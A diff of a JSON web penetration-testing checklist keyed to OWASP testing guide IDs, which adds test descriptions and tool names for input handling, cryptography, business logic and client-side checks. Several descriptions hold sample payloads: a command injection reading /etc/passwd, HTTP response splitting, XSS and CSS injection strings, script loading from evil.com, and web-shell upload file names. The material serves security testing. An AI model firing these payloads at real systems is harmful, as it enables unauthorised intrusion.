+ "caption": "OTG-INPVAL-013, WAHHM - Test Handling of Input",
585
+ "description": "Understand the application platform, OS, folder structure, relative path and execute OS commands on a Web server.\n%3Bcat%20/etc/passwd\ntest.pdf+|+Dir C:\\ ",
586
+ "tools": "Burp Proxy, ZAP, Commix",
444
587
  "vrt_category": "server_side_injection"
445
588
  },
446
589
  {
447
590
  "key": "buffer_overflow",
448
591
  "title": "Testing for Buffer overflow",
449
- "description": "OTG-INPVAL-014, WAHHM - Test Handling of Input",
592
+ "caption": "OTG-INPVAL-014, WAHHM - Test Handling of Input",
593
+ "description": "Testing for heap overflow vulnerability\nTesting for stack overflow vulnerability\nTesting for format string vulnerability",
594
+ "tools": "Immunity Canvas, Spike, MSF, Nessus",
450
595
  "vrt_category": "server_side_injection"
451
596
  },
452
597
  {
453
598
  "key": "heap_overflow",
454
599
  "title": "Testing for Heap overflow",
455
- "description": ""
600
+ "caption": "",
601
+ "description": "",
602
+ "tools": ""
456
603
  },
457
604
  {
458
605
  "key": "stack_overflow",
459
606
  "title": "Testing for Stack overflow",
460
- "description": ""
607
+ "caption": "",
608
+ "description": "",
609
+ "tools": ""
461
610
  },
462
611
  {
463
612
  "key": "format_string",
464
613
  "title": "Testing for Format string",
465
- "description": ""
614
+ "caption": "",
615
+ "description": "",
616
+ "tools": ""
466
617
  },
467
618
  {
468
619
  "key": "incubated_vulnerabilities",
469
620
  "title": "Testing for incubated vulnerabilities",
470
- "description": "OTG-INPVAL-015, WAHHM - Test Handling of Input",
621
+ "caption": "OTG-INPVAL-015, WAHHM - Test Handling of Input",
622
+ "description": "File Upload, Stored XSS , SQL/XPATH Injection, Misconfigured servers (Tomcat, Plesk, Cpanel)",
623
+ "tools": "Burp Proxy, BeEF, MSF",
471
624
  "vrt_category": "server_security_misconfiguration"
472
625
  },
473
626
  {
474
627
  "key": "http_splitting_and_smuggling",
475
628
  "title": "Testing for HTTP Splitting/Smuggling",
476
- "description": "OTG-INPVAL-016, WAHHM - Test Handling of Input",
629
+ "caption": "OTG-INPVAL-016, WAHHM - Test Handling of Input",
630
+ "description": "param=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</html>",
631
+ "tools": "Burp Proxy, ZAP, netcat",
477
632
  "vrt_category": "server_side_injection"
478
633
  }
479
634
  ]
@@ -482,17 +637,22 @@
482
637
  "key": "error_handling",
483
638
  "title": "Error handling",
484
639
  "description": "",
640
+ "type": "checklist",
485
641
  "items": [
486
642
  {
487
643
  "key": "error_codes",
488
644
  "title": "Analysis of Error Codes",
489
- "description": "OTG-ERR-001, WAHHM - Recon and Analysis",
645
+ "caption": "OTG-ERR-001, WAHHM - Recon and Analysis",
646
+ "description": "Locate error codes generated from applications or web servers. Collect sensitive information from that errors (Web Server, Application Server, Database)",
647
+ "tools": "Burp Proxy, ZAP",
490
648
  "vrt_category": "server_security_misconfiguration"
491
649
  },
492
650
  {
493
651
  "key": "stack_traces",
494
652
  "title": "Analysis of Stack Traces",
495
- "description": "OTG-ERR-002, WAHHM - Recon and Analysis",
653
+ "caption": "OTG-ERR-002, WAHHM - Recon and Analysis",
654
+ "description": "Invalid Input / Empty inputs. Input that contains non alphanumeric characters or query syntax. Access to internal pages without authentication. Bypassing application flow.",
655
+ "tools": "Burp Proxy, ZAP",
496
656
  "vrt_category": "server_security_misconfiguration"
497
657
  }
498
658
  ]
@@ -501,23 +661,30 @@
501
661
  "key": "cryptography",
502
662
  "title": "Cryptography",
503
663
  "description": "",
664
+ "type": "checklist",
504
665
  "items": [
505
666
  {
506
667
  "key": "transport_layer_protection",
507
668
  "title": "Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection",
508
- "description": "OTG-CRYPST-001, WAHHM - Test Handling of Access",
669
+ "caption": "OTG-CRYPST-001, WAHHM - Test Handling of Access",
670
+ "description": "Identify SSL service, Identify weak ciphers/protocols (ie. RC4, BEAST, CRIME, POODLE)",
671
+ "tools": "testssl.sh, SSL Breacher",
509
672
  "vrt_category": "server_security_misconfiguration"
510
673
  },
511
674
  {
512
675
  "key": "padding_oracle",
513
676
  "title": "Testing for Padding Oracle",
514
- "description": "OTG-CRYPST-002, WAHHM - Test Handling of Access",
677
+ "caption": "OTG-CRYPST-002, WAHHM - Test Handling of Access",
678
+ "description": "Compare the responses in three different states:\nCipher text gets decrypted, resulting data is correct.\nCipher text gets decrypted, resulting data is garbled and causes some exception or error handling in the application logic.\nCipher text decryption fails due to padding errors.",
679
+ "tools": "PadBuster, Poracle, python-paddingoracle, POET",
515
680
  "vrt_category": "broken_authentication_and_session_management"
516
681
  },
517
682
  {
518
683
  "key": "unencrypted_channels",
519
684
  "title": "Testing for Sensitive information sent via unencrypted channels",
520
- "description": "OTG-CRYPST-003, WAHHM - Test Handling of Access",
685
+ "caption": "OTG-CRYPST-003, WAHHM - Test Handling of Access",
686
+ "description": "Check sensitive data during the transmission:\nInformation used in authentication (e.g. Credentials, PINs, Session identifiers, Tokens, Cookies…)\nInformation protected by laws, regulations or specific organizational policy (e.g. Credit Cards, Customers data)",
687
+ "tools": "Burp Proxy, ZAP, Curl",
521
688
  "vrt_category": "broken_authentication_and_session_management"
522
689
  }
523
690
  ]
@@ -526,57 +693,76 @@
526
693
  "key": "business_logic",
527
694
  "title": "Business Logic Testing",
528
695
  "description": "",
696
+ "type": "checklist",
529
697
  "items": [
530
698
  {
531
699
  "key": "data_validation",
532
700
  "title": "Test Business Logic Data Validation",
533
- "description": "OTG-BUSLOGIC-001, WAHHM - Test for Logic Flaws",
701
+ "caption": "OTG-BUSLOGIC-001, WAHHM - Test for Logic Flaws",
702
+ "description": "Looking for data entry points or hand off points between systems or software.\nOnce found try to insert logically invalid data into the application/system.",
703
+ "tools": "Burp Proxy, ZAP",
534
704
  "vrt_category": "broken_access_control"
535
705
  },
536
706
  {
537
707
  "key": "forge_requests",
538
708
  "title": "Test Ability to Forge Requests",
539
- "description": "OTG-BUSLOGIC-002, WAHHM - Test for Logic Flaws",
709
+ "caption": "OTG-BUSLOGIC-002, WAHHM - Test for Logic Flaws",
710
+ "description": "Looking for guessable, predictable or hidden functionality of fields.\nOnce found, try to insert logically valid data into the application/system allowing the user to go through the application/system against the normal business logic workflow.",
711
+ "tools": "Burp Proxy, ZAP",
540
712
  "vrt_category": "server_side_injection"
541
713
  },
542
714
  {
543
715
  "key": "integrity_check",
544
716
  "title": "Test Integrity Checks",
545
- "description": "OTG-BUSLOGIC-003, WAHHM - Test for Logic Flaws",
717
+ "caption": "OTG-BUSLOGIC-003, WAHHM - Test for Logic Flaws",
718
+ "description": "Looking for parts of the application/system (components i.e. For example, input fields, databases or logs) that move, store or handle data/information.\nFor each identified component determine what type of data/information is logically acceptable and what types the application/system should guard against. Also, consider who according to the business logic is allowed to insert, update and delete data/information and in each component.\nAttempt to insert, update or edit delete the data/information values with invalid data/information into each component (i.e. input, database, or log) by users that .should not be allowed per the business logic workflow.",
719
+ "tools": "Burp Proxy, ZAP",
546
720
  "vrt_category": "broken_access_control"
547
721
  },
548
722
  {
549
723
  "key": "process_timing",
550
724
  "title": "Test for Process Timing",
551
- "description": "OTG-BUSLOGIC-004, WAHHM - Test for Logic Flaws",
725
+ "caption": "OTG-BUSLOGIC-004, WAHHM - Test for Logic Flaws",
726
+ "description": "Looking for application/system functionality that may be impacted by time. Such as execution time or actions that help users predict a future outcome or allow one to circumvent any part of the business logic or workflow. For example, not completing transactions in an expected time.\nDevelop and execute the mis-use cases ensuring that attackers cannot gain an advantage based on any timing.",
727
+ "tools": "Burp Proxy, ZAP",
552
728
  "vrt_category": "server_side_injection"
553
729
  },
554
730
  {
555
731
  "key": "usage_limits",
556
732
  "title": "Test Number of Times a Function Can be Used Limits",
557
- "description": "OTG-BUSLOGIC-005, WAHHM - Test for Logic Flaws",
733
+ "caption": "OTG-BUSLOGIC-005, WAHHM - Test for Logic Flaws",
734
+ "description": "Looking for functions or features in the application or system that should not be executed more than a single time or specified number of times during the business logic workflow.\nFor each of the functions and features found that should only be executed a single time or specified number of times during the business logic workflow, develop abuse/misuse cases that may allow a user to execute more than the allowable number of times.",
735
+ "tools": "Burp Proxy, ZAP",
558
736
  "vrt_category": "broken_access_control"
559
737
  },
560
738
  {
561
739
  "key": "workflow_circumvention",
562
740
  "title": "Testing for the Circumvention of Work Flows",
563
- "description": "OTG-BUSLOGIC-006, WAHHM - Test for Logic Flaws",
741
+ "caption": "OTG-BUSLOGIC-006, WAHHM - Test for Logic Flaws",
742
+ "description": "Looking for methods to skip or go to steps in the application process in a different order from the designed/intended business logic flow.\nFor each method develop a misuse case and try to circumvent or perform an action that is 'not acceptable' per the business logic workflow.",
743
+ "tools": "Burp Proxy, ZAP",
564
744
  "vrt_category": "broken_access_control"
565
745
  },
566
746
  {
567
747
  "key": "application_misuse",
568
748
  "title": "Test Defenses Against Application Mis-use",
569
- "description": "OTG-BUSLOGIC-007, WAHHM - Test for Logic Flaws"
749
+ "caption": "OTG-BUSLOGIC-007, WAHHM - Test for Logic Flaws",
750
+ "description": "Measures that might indicate the application has in-built self-defense:\nChanged responses, Blocked requests, Actions that log a user out or lock their account",
751
+ "tools": "Burp Proxy, ZAP"
570
752
  },
571
753
  {
572
754
  "key": "upload_unexpected_files",
573
755
  "title": "Test Upload of Unexpected File Types",
574
- "description": "OTG-BUSLOGIC-008, WAHHM - Test for Logic Flaws"
756
+ "caption": "OTG-BUSLOGIC-008, WAHHM - Test for Logic Flaws",
757
+ "description": "Review the project documentation and perform some exploratory testing looking for file types that should be 'unsupported' by the application/system.\nTry to upload these “unsupported” files and verify that they are properly rejected.\nIf multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated. PS. file.phtml, shell.phPWND, SHELL~1.PHP",
758
+ "tools": "Burp Proxy, ZAP"
575
759
  },
576
760
  {
577
761
  "key": "malicious_files",
578
762
  "title": "Test Upload of Malicious Files",
579
- "description": "OTG-BUSLOGIC-009, WAHHM - Test for Logic Flaws",
763
+ "caption": "OTG-BUSLOGIC-009, WAHHM - Test for Logic Flaws",
764
+ "description": " Develop or acquire a known “malicious” file.\nTry to upload the malicious file to the application/system and verify that it is correctly rejected.\nIf multiple files can be uploaded at once, there must be tests in place to verify that each file is properly evaluated.",
765
+ "tools": "Burp Proxy, ZAP",
580
766
  "vrt_category": "server_security_misconfiguration"
581
767
  }
582
768
  ]
@@ -585,78 +771,115 @@
585
771
  "key": "client_side",
586
772
  "title": "Client Side Testing",
587
773
  "description": "",
774
+ "type": "checklist",
588
775
  "items": [
589
776
  {
590
777
  "key": "dom_based_xss",
591
778
  "title": "Testing for DOM based Cross Site Scripting",
592
- "description": "OTG-CLIENT-001, WAHHM - Miscellaneous Tests",
779
+ "caption": "OTG-CLIENT-001, WAHHM - Miscellaneous Tests",
780
+ "description": "Test for the user inputs obtained from client-side JavaScript Objects",
781
+ "tools": "Burp Proxy, DOMinator",
593
782
  "vrt_category": "cross_site_scripting_xss"
594
783
  },
595
784
  {
596
785
  "key": "javascript_execution",
597
786
  "title": "Testing for JavaScript Execution",
598
- "description": "OTG-CLIENT-002, WAHHM - Test Handling of Input",
787
+ "caption": "OTG-CLIENT-002, WAHHM - Test Handling of Input",
788
+ "description": "Inject JavaScript code:\nwww.victim.com/?javascript:alert(1)",
789
+ "tools": "Burp Proxy, ZAP",
599
790
  "vrt_category": "cross_site_scripting_xss"
600
791
  },
601
792
  {
602
793
  "key": "html_injection",
603
794
  "title": "Testing for HTML Injection",
604
- "description": "OTG-CLIENT-003, WAHHM - Test Handling of Input",
795
+ "caption": "OTG-CLIENT-003, WAHHM - Test Handling of Input",
796
+ "description": "Send malicious HTML code:\n?user=<img%20src='aaa'%20onerror=alert(1)>",
797
+ "tools": "Burp Proxy, ZAP",
605
798
  "vrt_category": "server_side_injection"
606
799
  },
607
800
  {
608
801
  "key": "url_redirect",
609
802
  "title": "Testing for Client Side URL Redirect",
610
- "description": "OTG-CLIENT-004, WAHHM - Test Handling of Input",
803
+ "caption": "OTG-CLIENT-004, WAHHM - Test Handling of Input",
804
+ "description": "Modify untrusted URL input to a malicious site:\n(Open Redirect)?redirect=www.fake-target.site",
805
+ "tools": "Burp Proxy, ZAP",
611
806
  "vrt_category": "unvalidated_redirects_and_forwards"
612
807
  },
613
808
  {
614
809
  "key": "css_injection",
615
810
  "title": "Testing for CSS Injection",
616
- "description": "OTG-CLIENT-005, WAHHM - Test Handling of Input",
811
+ "caption": "OTG-CLIENT-005, WAHHM - Test Handling of Input",
812
+ "description": "nject code in the CSS context :\nwww.victim.com/#red;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12])\nwww.victim.com/#red;-:expression(alert(URL=1)); (IE 7/8)",
813
+ "tools": "Burp Proxy, ZAP",
617
814
  "vrt_category": "server_security_misconfiguration"
618
815
  },
619
816
  {
620
817
  "key": "resource_manipulation",
621
818
  "title": "Testing for Client Side Resource Manipulation",
622
- "description": "OTG-CLIENT-006, WAHHM - Test Handling of Input",
819
+ "caption": "OTG-CLIENT-006, WAHHM - Test Handling of Input",
820
+ "description": "External JavaScript could be easily injected in the trusted web site\nwww.victim.com/#http://evil.com/js.js",
821
+ "tools": "Burp Proxy, ZAP",
623
822
  "vrt_category": "server_security_misconfiguration"
624
823
  },
625
824
  {
626
825
  "key": "cors",
627
826
  "title": "Test Cross Origin Resource Sharing",
628
- "description": "OTG-CLIENT-007, WAHHM - Miscellaneous Tests",
827
+ "caption": "OTG-CLIENT-007, WAHHM - Miscellaneous Tests",
828
+ "description": "Check the HTTP headers in order to understand how CORS is used (Origin Header)",
829
+ "tools": "Burp Proxy, ZAP",
629
830
  "vrt_category": "server_security_misconfiguration"
630
831
  },
631
832
  {
632
833
  "key": "cross_site_flashing",
633
834
  "title": "Testing for Cross Site Flashing",
634
- "description": "OTG-CLIENT-008, WAHHM - Test Handling of Input",
835
+ "caption": "OTG-CLIENT-008, WAHHM - Test Handling of Input",
836
+ "description": "Decompile, Undefined variables, Unsafe methods, Include malicious SWF http://victim/file.swf?lang=http://evil",
837
+ "tools": "FlashBang, Flare, Flasm, SWFScan, SWF Intruder",
635
838
  "vrt_category": "server_security_misconfiguration"
636
839
  },
637
840
  {
638
841
  "key": "clickjacking",
639
842
  "title": "Testing for Clickjacking",
640
- "description": "OTG-CLIENT-009, WAHHM - Miscellaneous Tests",
843
+ "caption": "OTG-CLIENT-009, WAHHM - Miscellaneous Tests",
844
+ "description": "Discover if a website is vulnerable by loading into an iframe, create a simple web page that includes a frame containing the target.",
845
+ "tools": "Burp Proxy",
641
846
  "vrt_category": "server_security_misconfiguration"
642
847
  },
643
848
  {
644
849
  "key": "web_sockets",
645
850
  "title": "Testing WebSockets",
646
- "description": "OTG-CLIENT-010, WAHHM - Test Handling of Input"
851
+ "caption": "OTG-CLIENT-010, WAHHM - Test Handling of Input",
852
+ "description": "Identify that the application is using WebSockets by inspecting ws:// or wss:// URI scheme.\nUse Google Chrome's Developer Tools to view the Network WebSocket communication.\nCheck Origin, Confidentiality and Integrity, Authentication, Authorization, Input Sanitization",
853
+ "tools": "Burp Proxy, Chrome, ZAP, WebSocket Client"
647
854
  },
648
855
  {
649
856
  "key": "web_messaging",
650
857
  "title": "Test Web Messaging",
651
- "description": "OTG-CLIENT-011, WAHHM - Test Handling of Input"
858
+ "caption": "OTG-CLIENT-011, WAHHM - Test Handling of Input",
859
+ "description": "Analyse JavaScript code looking for how Web Messaging is implemented. How the website is restricting messages from untrusted domain and how the data is handled even for trusted domains",
860
+ "tools": "Burp Proxy, ZAP"
652
861
  },
653
862
  {
654
863
  "key": "local_storage",
655
864
  "title": "Test Local Storage",
656
- "description": "OTG-CLIENT-012, WAHHM - Miscellaneous Tests",
657
- "vrt_category": "server_security_misconfiguration"
865
+ "caption": "OTG-CLIENT-012, WAHHM - Miscellaneous Tests",
866
+ "vrt_category": "server_security_misconfiguration",
867
+ "description": "Determine whether the website is storing sensitive data in the storage.\nXSS in localstorage http://server/StoragePOC.html#<img src=x onerror=alert(1)>",
868
+ "tools": "Chrome, Firebug, Burp Proxy, ZAP"
658
869
  }
659
870
  ]
871
+ },
872
+ {
873
+ "key": "upload_logs",
874
+ "title": "Upload logs",
875
+ "description": "This should include all associated traffic associated to the in-scope targets.",
876
+ "type": "large_upload"
877
+ },
878
+ {
879
+ "key": "executive_summary",
880
+ "title": "Executive summary",
881
+ "description": "The executive summary should be written with a high-level view of both risk and business impact. It should be concise and clear, therefore it is important to use plain English. This ensures that non-technical readers can gain insight into security concerns outlined in your report.",
882
+ "type": "executive_summary"
660
883
  }
661
884
  ]
662
885
  }